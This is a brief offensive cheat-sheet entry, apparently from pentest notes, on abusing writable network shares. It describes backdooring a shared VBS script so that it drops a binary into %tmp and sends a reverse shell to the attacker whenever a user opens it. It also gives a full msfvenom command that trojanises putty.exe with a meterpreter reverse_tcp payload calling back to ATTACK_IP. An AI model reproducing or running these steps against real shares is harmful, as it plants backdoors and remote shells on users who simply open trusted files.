Abuse Writable Shares
ABUSING WRITEABLE SHARES
Find shortcut to a script or executable file hosted on a network share.
BACKDOORING .vbs SCRIPTS
Copies binary from the share to the user's workstation %tmp directory and send a reverse shell back to attacker whenever a user opens the shared VBS script.
BACKDOORING .exe FILES
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=ATTACK_IP lport=PORT -b "\x00" -f exe -o puttyX.exeLast updated